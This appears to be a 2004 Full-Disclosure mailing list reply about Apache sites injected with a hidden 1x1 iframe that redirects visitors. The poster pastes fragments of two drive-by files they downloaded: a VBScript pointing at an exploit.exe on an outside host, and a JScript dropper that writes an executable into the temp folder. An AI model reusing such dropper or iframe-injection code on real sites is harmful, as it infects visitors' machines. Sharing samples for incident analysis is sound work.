using konqueror i got it to download these two files Filename 1: 2DimensionOfExploitsEnc.php
<html> <script language=vbs> szURL = "http://www.pizdato.biz/acc1/exploit.exe"; </script> <script language="VBScript.Encode"> Filename 2: object2.cfm <script language=jscript> self.moveTo(5000,5000); self.close(); fs=new ActiveXObject("Scripting.FileSystemObject"); fname=fs.GetSpecialFolder(2)+'\\q381275.exe'; a=fs.CreateTextFile(fname,true); a.Write('MZ'); a.Close(); a=fs.OpenTextFile(fname,8,false,true); >Message: 1 >From: Filbert <[EMAIL PROTECTED]> >Reply-To: [EMAIL PROTECTED] >To: [EMAIL PROTECTED] >Date: Sun, 23 May 2004 15:19:30 +0200 >Organization: Hell >Subject: [Full-Disclosure] browser hijack by apache >sites >Hi, >This is the second time this weekend that I've been >warned of an apache >site >on a Linux server were a line of code was added to >redirect browsers to >porn >sites. >First was the site of a Belgian political party. >Second came today, and >as of >writing this it's still there. The admin was informed >so it can be gone >soon. >hxxp://www.previsit.com/carrefour/nl/ <- hxxp must >changed to http >IE users do NOT click. >the code added at the bottom is: ><iframe SRC="http://www.b00gle.com/fa/?d=get"; WIDTH=1 >HEIGHT=1></iframe></body> >anyone seen this before? What vulnerability is >exploited here? FP? >Thx, >Filb. __________________________________ Do you Yahoo!? Yahoo! Domains � Claim yours for only $14.70/year http://smallbusiness.promotions.yahoo.com/offer _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
